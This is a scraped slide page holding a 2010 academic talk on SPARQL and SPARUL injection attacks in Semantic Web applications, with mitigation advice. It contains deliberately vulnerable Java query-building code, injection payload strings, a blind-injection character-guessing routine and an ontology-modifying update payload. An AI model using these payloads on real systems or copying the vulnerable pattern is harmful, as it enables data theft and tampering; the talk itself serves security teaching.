SmartphoneHacking_Android_ExploitationSmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_Exploitation
 

Dernier

Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfOverkill Security
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 

Dernier (20)

Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 

Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages

  • 1. Introduction Vulnerable code samples Addressing code injection Conclusions Addressing Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages Pablo Ordu˜a, Aitor Almeida, Unai Aguilera, Xabier Laiseca, n Diego L´pez-de-Ipi˜a, Aitor G´mez-Goiri o n o September 9th, 2010 Future Internet - Elkarlaneko ikerkuntza estrategikorako programa; ETORTEK 2008 img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 2. Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Introduction The Semantic Web is based on a set of technologies: XML RDF OWL ... img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 3. Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Query Languages New technologies have been developed to query the ontologies later later RDQL − − SPARQL − − SPARUL −→ −→ These new query languages are based on SQL RDQL and SPARQL → Read-only query languages introduces SPARUL (SPARQL/Update) − − − − modification − − −→ capabilities SPARQL Sample: 1 PREFIX injection: <http://www.morelab.deusto.es/ injection.owl#> 2 SELECT ?p1 3 WHERE { 4 ?p1 a injection:Person . 5 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 4. Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Security issues The use of these new query languages introduce vulnerabilities already found in a bad use of query languages Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known Libraries provide tools to sanitize user input in these languages A proper usage of the query languages is required in order to face new techniques, including: (Blind) SPARQL Injection SPARUL Injection img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 5. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection The following query is assumed to retrieve the friends of a user whom fullName is provided by the variable name The ontology is available in http://www.morelab.deusto.es/injection.owl img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 6. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 " + 4 "WHERE {" + 5 " ?p1 a injection:Person . " + 6 " ?p2 a injection:Person . " + 7 " ?p1 injection:fullName ’" + name + "’ . " + 8 " ?p1 injection:isFriendOf ?p2 . " + 9 " ?p1 injection:fullName ?name1 . " + 10 " ?p2 injection:fullName ?name2 . " + 11 "}"; 12 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 7. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection This code can be exploited to retrieve any information in the ontology The problem is that the variable name has not been sanitized This variable can include SPARQL code, and thus modify the query itself A variable with malicious content can be found in the next slide img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 8. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 " ?p1 injection:fullName ?name1 . " + 9 " ?p2 injection:fullName ?name2 . " + 10 "}"; 11 String name = "Pablo Orduna’ . " + 12 "?b1 a injection:Building . " + 13 "?b1 injection:name ?name1 . " + 14 "} #"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 9. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + "Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + "’ . " + 10 " ?p1 injection:isFriendOf ?p2 . " + 11 " ?p1 injection:fullName ?name1 . " + 12 " ?p2 injection:fullName ?name2 . " + 13 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 10. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + /* From this point everything 10 is commented and thus ignored */ "’ . " + 11 " ?p1 injection:isFriendOf ?p2 . " + 12 " ?p1 injection:fullName ?name1 . " + 13 " ?p2 injection:fullName ?name2 . " + 14 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 11. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection This code will return the name of the building instead of the name of a user It is possible to use the flexibility of SPARQL to perform other kind of queries retrieving any information in the ontology img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 12. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Introducing Blind SPARQL Injection The previous sample was especially vulnerable since it returned a string It is possible to retrieve any information as a string Strings are usually not retrieved in SPARQL, but individuals What if the returning value is an individual? It’s still possible to retrieve any information If it’s possible to know if a given query is true or false, it’s possible to iteratively retrieve any information The following code retrieves the individuals themselves It’s possible to know if the query provided or not the individuals img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 13. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 4 "SELECT ?p1 ?p2 " + 5 "WHERE {" + 6 " ?p1 a injection:Person . " + 7 " ?p2 a injection:Person . " + 8 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 9 " ?p1 injection:isFriendOf ?p2 . " + 10 "}"; 11 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 14. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Once again, the variable name has not been sanitized So it’s still possible to inject SPARQL code The injected code can’t return a building or the building name But, adding a condition like “does the building name start by this letter” we will get: The common results → so the building name starts by that letter No results → so the building name does not start by that letter img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 15. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = /* PREFIXES ... */ 2 "SELECT ?p1 ?p2 " + 3 "WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 "}"; 9 String name = "Pablo Orduna’ . " + 10 "?b1 a injection:Building . " + 11 "?b1 injection:name ?buildingName . " + 12 "FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 13 "} #"; // }:-D img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 16. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query would be. . . 1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?p1 ?p2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?buildingName . " + 9 " FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 10 " } #" + /* from here ignored*/ "’ˆˆxsd:string . " + 11 " ?p1 injection:isFriendOf ?p2 . }"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 17. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Querying recursively. . . 1 public static String recursively(String letters) throws Exception{ 2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++ i){ 3 char c = POSSIBLE_LETTERS.charAt(i); 4 if(tryBlind(letters + c)){ 5 System.out.println(c); 6 return "" + c + recursively(letters + c); 7 } 8 } 9 return ""; 10 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 18. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection It is possible to optimize this system using binary search Performing queries using Regular Expressions like ˆ[A-M].* to know if the char is between the char A and M Given a charset of length 64, we would reduce the number of iterations from 64 times 10 (640) to 6 times 10 (60) Using the whole UTF-16 charset, it would reduce the number of iterations from 65536 times 10 (655360) to 16 times 10 (160) The point is that it’s possible to retrieve any information in the ontology independently from the values returned by the query img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 19. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection Introducing SPARQL/Update Injection All the previous examples are executed in read-only query languages SPARUL introduces the chance to modify the ontology INSERT, MODIFY and DELETE statements are available The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 20. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String updateString = "PREFIX injection: <http:// www.morelab.deusto.es/injection.owl#> " + 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "DELETE {" + 4 " injection:Pablo injection:fullName ?name1 "+ 5 "} WHERE {" + 6 " injection:Pablo injection:fullName ?name1" + 7 "}n INSERT {" + 8 " injection:Pablo injection:fullName ’" + name + "’ˆˆxsd:string" + 9 "}"; 10 UpdateRequest update = UpdateFactory.create( updateString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 21. Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String name = "Pablo Ordunya’ˆˆxsd:string" + 2 "} n " + 3 "INSERT {" + 4 " injection:Pablo injection:isFriendOf injection:EvilMonkey" + 5 "} #"; // }:-D 6 String result = sample.run(name); With this vulnerability, it is possible to modify the whole ontology. img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 22. Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Addressing code injection Mechanisms provided by the library must be used (if provided) Not as simple as scaping the ’ characters: the string u0027 is a simple quote, just as in Java 1 System.out.println("au0022.length() + u0022b".length()); 2 // This code prints "2", the result of ("a".length() + "b".length()) 3 // since u0022 will be replaced by " even if it is commented or inside 4 // String img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 23. Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Frameworks In Jena, the initialBinding argument can be used in the QueryExecutionFactory 1 // initial binding 2 QuerySolutionMap initialBinding = new QuerySolutionMap(); 3 RDFNode parameterizedName = model.createLiteral( name); 4 initialSetting.add("thename", parameterizedName); 5 6 // Perform the query 7 Query query = QueryFactory.create(queryString); 8 QueryExecution qe = QueryExecutionFactory.create( query, model, initialBinding); 9 ResultSet results = qe.execSelect(); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 24. Introduction Vulnerable code samples Addressing code injection Conclusions Conclusions Not sanitizing the user input might add a set of security vulnerabilities in our systems In the paper it is presented how new query languages inherit security issues present in older query languages, and therefore they should also be taken into account when working with them img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 25. Introduction Vulnerable code samples Addressing code injection Conclusions Questions? DeustoTech - Internet http://www.morelab.deusto.es Pablo Ordu˜an pablo.orduna@deusto.es Aitor Almeida aitor.almeida@deusto.es Unai Aguilera unai.aguilera@deusto.es Xabier Laiseca xabier.laiseca@deusto.es Diego L´pez-de-Ipi˜a o n dipina@deusto.es Aitor G´mez-Goiri o aitor.gomez@deusto.es img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .